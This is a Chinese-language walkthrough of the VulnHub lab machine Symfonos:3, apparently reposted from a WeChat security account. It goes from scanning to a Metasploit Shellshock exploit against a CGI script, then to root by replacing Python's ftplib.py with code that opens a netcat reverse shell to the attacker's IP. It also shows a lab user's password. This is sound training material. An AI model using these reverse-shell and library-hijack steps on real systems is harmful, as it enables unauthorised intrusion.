OSCP难度靶机之Symfonos:3

admin 2022年3月30日10:05:03评论141 views字数 1686阅读5分37秒阅读模式

虚拟机信息:

虚拟机下载地址:https://www.vulnhub.com/entry/symfonos-3,332/

虚拟机简介:类似 OSCP 的基于现实生活的中级机器,旨在教授理解漏洞的重要性

目标:1个flag

级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Symfonos:3

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.143

查看开放21、22、80端口

OSCP难度靶机之Symfonos:3

2、渗透测试

2.1 HTTP渗透测试

1.访问站点

OSCP难度靶机之Symfonos:3

查看网页源代码,提示爆破出underworld

OSCP难度靶机之Symfonos:3

2.使用gobuster进行爆破

gobuster dir -u http://192.168.207.143  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x html,php,txt -q -k -f

OSCP难度靶机之Symfonos:3

3.爆破二级目录

gobuster dir -u http://192.168.207.143/cgi-bin  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x html,php,txt -q -k -f

发现在cgi-bin中存在/underworld/

OSCP难度靶机之Symfonos:3

4.访问站点查看有系统运行时间

http://192.168.207.143/cgi-bin/underworld

OSCP难度靶机之Symfonos:3

5.通过CGI-bin注入

在网上有相关CGI注入介绍:https://book.hacktricks.xyz/pentesting/pentesting-web/cgi

CGI  (通用网关接口)定义了一种 Web 服务器与外部内容生成程序交互的方式,这些程序通常被称为 CGI 程序CGI 脚本。

使用metasploit可以进行CGI

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhosts 192.168.207.143
set targeturi /cgi-bin/underworld/
set lhost 192.168.207.129
run

获取到meterpreter会话

OSCP难度靶机之Symfonos:3

2.2 系统提权操作

1.探测系统版本

sysinfo

OSCP难度靶机之Symfonos:3

探测系统没有GCC

which gcc

OSCP难度靶机之Symfonos:3

2.查找二进制文件

find / -perm -u=s -type f 2>/dev/null

ping命令无提权方法

OSCP难度靶机之Symfonos:3

3.查看ftp服务

ps -ef | grep ftp

查看启动用户为hades

OSCP难度靶机之Symfonos:3

cat /etc/passwd | grep '/bin/bash'

查看该用户可以登录

OSCP难度靶机之Symfonos:3

4.查找各种方法测试,均不行

查看网上分析的教程,可以使用tcpdump进行抓取lo口分析,提示无权限

OSCP难度靶机之Symfonos:3

5.根据网上获取到的用户名和密码继续

用户名为:hades ,密码为:PTpZTfU4vxgzvRBE

上传psy32文件

upload /root/pspy32

OSCP难度靶机之Symfonos:3

6.查看pspy32监控信息

查看到以root身份执行的脚步

OSCP难度靶机之Symfonos:3

登录hades账户查看信息

cd /opt/ftpclient
ls -lah

OSCP难度靶机之Symfonos:3

7.文档无法写入

基于其他的文档中,ftpclient.py无写入权限,考虑利用ftp库

find / -iname '*ftplib*' 2>/dev/null

OSCP难度靶机之Symfonos:3

2.3 配置提权

1.写入文件到ftplib

echo 'os.system("nc -e /bin/bash 192.168.207.129 4444")' >> /usr/lib/python2.7/ftplib.py

提示无权限

OSCP难度靶机之Symfonos:3

2.创建新的文件

mv /usr/lib/python2.7/ftplib.py /usr/lib/python2.7/ftplib.py.bak
nano /usr/lib/python2.7/ftplib.py

import os
cmd="nc 192.168.207.129 4444 -e /bin/bash"
os.system(cmd)

OSCP难度靶机之Symfonos:3

OSCP难度靶机之Symfonos:3

3.查看反弹信息

OSCP难度靶机之Symfonos:3

4.查看flag

OSCP难度靶机之Symfonos:3

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Symfonos:3

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月30日10:05:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Symfonos:3https://cn-sec.com/archives/855037.html

发表评论

匿名网友 填写信息